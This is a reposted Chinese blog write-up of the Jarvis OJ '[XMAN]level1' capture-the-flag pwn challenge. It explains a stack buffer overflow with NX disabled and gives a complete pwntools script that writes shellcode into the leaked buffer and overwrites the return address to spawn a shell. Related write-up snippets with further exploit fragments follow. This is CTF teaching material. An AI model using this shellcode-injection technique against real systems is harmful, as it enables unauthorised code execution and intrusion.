Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用

最新推荐文章于 2021-02-01 19:34:55 发布
最新推荐文章于 2021-02-01 19:34:55 发布
阅读量240 收藏
点赞数
文章标签: shell python
原文链接:http://www.cnblogs.com/ZHijack/p/7899166.html
版权

100分的pwn

 

简单查看一下,果然还是比较简单的

 

放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护

所以我们很容易想到构造shellcode,在栈中执行shellcode拿shell权限

shellcode是一段恶意代码,在没有NX保护程序中,可能作为输入而写进栈,之后运行到此处时可以执行shellcode指令从而达到目的

所以我们先截取buf的地址,在buf中写入夺shell的shellcode,之后再用buf的地址覆盖函数返回地址

从而执行shellcode获取目标shell

从abo偷来栈帧示意图一张图,如有侵权,打死我也不删

 

#!user/bin/env python
# encoding:utf-8

from pwn import *
io = remote("pwn2.jarvisoj.com",9877)
shellcode = asm(shellcraft.sh())
buffer=io.recvline()[14:-2]
buf_addr = int(buffer,16)
payload = shellcode + '\x90' * (0x88+0x4-len(shellcode)) + p32(buf_addr)
io.sendline(payload)
io.interactive()
io.close()

 

记两个空手套shellcode的网站

http://shell-storm.org/shellcode/

https://www.exploit-db.com/shellcode/

 




作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/ZHijack/p/7899166.html

aoque9909
关注
jarvisoj WEB +MISC writeup
Ni9htMar3的博客
12-26 7308
WEB PORT 51 Login LOCALHOST 神盾局的秘密 IN a mess Easy Gallery Simple Injection 方法一 方法二 api的调用 PHPINFO
Jarvis OJ--level3
Kni9hT's Blog
11-10 262
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 434
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
Jarvis OJ [XMAN]level1 write up
03-12 130
首先 老规矩,把软件拖到Ubuntu里checksec一下文件 然后知道了软件位数就放到IDA32里面。。。 熟悉的函数名。。。 缘真的妙不可言。。。 然后看了下vulnerable_function函数的栈结构 算了下 vulnerable_function中的read函数准备给buf 0x100的空间 但是buf却用了0x88+0x4就结束了vul...
[JarvisOj][XMAN]level1
weixin_34088838的博客
07-30 154
都没开。。。 ida分析 发现返回了buf的地址 并没有自带system 或者/bin/sh 所以估计是自己写shellcode 偷个图。。。 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * shellcode = asm(shellcraft.sh(...
[Jarvis OJ - PWN]——[XMAN]level1
Y_peak的博客
02-01 350
[Jarvis OJ - PWN]——[XMAN]level1 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,什么保护都没有开。32位程序。 看看IDA,找到了可以利用的栈溢出的read函数. 开开心心的去找system函数.找了半天没找到,同时也没有/bin/sh字符串 并且这道题什么保护都没开,应该是ret2shellcodepwn题.buff2的地址题目给输出了出来.所以 exp: from pwn import *
Jarvis OJ --level4
Kni9hT's Blog
11-11 263
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
Jarvis OJ - Basic - veryeasyRSA(用实例详解RSA--超容易理解)
丫丫的博客
11-27 1582
最近在研究RSA,好久没更新了......翻了数论的欧拉-费小马-模反--等等..不研究清楚他们的联系和这题的原理实在不想直接做题啥也不懂....总结了wiki和各路大神的分析,先来一波数学基础知识: RSA加密算法是一种非对称加密算法。 对极大整数做因数分解的难度决定了RSA算法的可靠性。换言之,对一极大整数做因数分解愈困难,RSA算法愈可靠。假如有人找到一种快速因数分解的算法的话,那么用R...
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 393
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 291
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
18.9.18 Jarvis OJ PWN----[XMAN]level1
qq_42192672的博客
09-18 234
拖进IDA 这次先是一个vulnerable_function函数,再是一个write函数 查看保护机制,发现没有开启,大佬说保护机制没开启,就可以用shellcode啦 接下来看函数内部 可以看到buf的缓冲区大小为0x100个字节,但是其偏移量是0x88个字节 在0x88个字节中首先要留出shellcode的空间(注意这里是32位的) 最终返回的地址显然也要返回到shell...
Jarvis OJ-PWN-[XMAN]level1 wp
分不清东西南北的Laffey
09-26 1156
地址:nc pwn2.jarvisoj.com 9877 第一步:用checksec看开启了哪些保护 32位的 程序编译时关了栈不可执行保护 第二步:用IDA看伪代码 进去之后F5看到主函数 跟进vulnerable_function()函数 第三步:找到溢出点并加以分析 我们需要覆盖函数的返回地址 将其地址覆盖成shellcode的返回地址 这道题不像level0 里面有system函数...
Jarvis OJ level1 writeup
PLpa的博客
07-07 708
拿到题目,首先我们检查一下程序的保护: 可以看出来,程序什么保护也没开,既然没开NX保护,说明堆栈上的代码可以执行。 我们打开IDA反汇编一下: 我们看到这里可输入一个buf,并且题目把buf的地址也输出到屏幕上,我们就可以控制buf植入shell code了,再返回调用即可。 ...
JarvisOJ PWN level1 wp
苗_的博客
01-08 262
level1 checksec看一下保护,几乎没什么保护措施: 先拖进IDA里面看一下(f5大法好),发现栈溢出点: f12没发现"/bin/sh",看一下printf函数会把buf的地址输出出来,我们将它截取,并保存在buf_addr中。由于NX是关闭的状态,也就是说我们把shellcode写进buf里面,函数返回时跳转回buf的位置,就可以执行shellcode了。因此我们把sh...
JarvisOJ BASIC -.-字符串
weixin_30681615的博客
01-16 386
请选手观察以下密文并转换成flag形式 ..-. .-.. .- --. ..... ..--- ..--- ----- .---- ---.. -.. -.... -.... ..... ...-- ---.. --... -.. .---- -.. .- ----. ...-- .---- ---.. .---- ..--- -... --... --... --... -.......
jarvis oj 软件密码破解-3 Writeup
charlie_heng的专栏
11-25 583
打开软件,首先用mfc工具找一下那几个按钮的处理函数发现确定按钮默认是不能点击的,看了下函数,发现要输入字符长度为16,且只包含A-F和0-9先输一下16个1,找了几个比较可疑的函数下断点,发现有个函数断成功了sub_401B80首先是调用了一个函数,对输入的字符处理一波,然后在后面一长串判断条件里面判断处理后的东西是否是对的这里很简单就能解出这八个字符的ASCII码是 119,51,49,108
jarvisoj pwn level1 ——记第一次shellcode的编写
Vccxx的博客
03-19 3673
jarvisoj(https://www.jarvisoj.com/challenges )pwn部分 level1 解题过程:在队友的指导下写了人生第一个shellcode感觉很刺激,过程中还是学到了很多东西,记录一下这个程序流程很简单,用ida分析就两个主要的函数:main:int __cdecl main(int argc, const char **argv, const char **en
XMAN misc writeup
RobinZZX的博客
08-03 1628
misc: cephalopod pcap是常见的数据报存储格式,在这个题目中我们首先用binwalk检查出pcap中含有一个png文件, 然后使用tcpxtract从pcap找那个提取出png文件,文件内容即flag easycap 直接追踪流然后将FLAG后面部分base64解密 Erik-Baleog-and-Olaf 文件名字叫stego100,提示我们使用stegsolve工...
171202 逆向-JarvisOJ(软件密码破解-3)(1)
whklhhhh的博客
12-02 696
1625-5 王子昂 总结《2017年12月2日》 【连续第428天总结】 A. JarvisOJ-Re-软件密码破解-3(1) B. 说2有点意思的报应来了……这又来个3,并且还挺坑的OTZ查壳发现没有,直接打开,发现“确定”按钮是不可用状态 以为跟上次的一题一样是故意改的,于是使用SpyLite将按钮改为可用,结果马上就又变回去了,说明有代码在操作那么就不是这种小花招了,去OD中断G
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值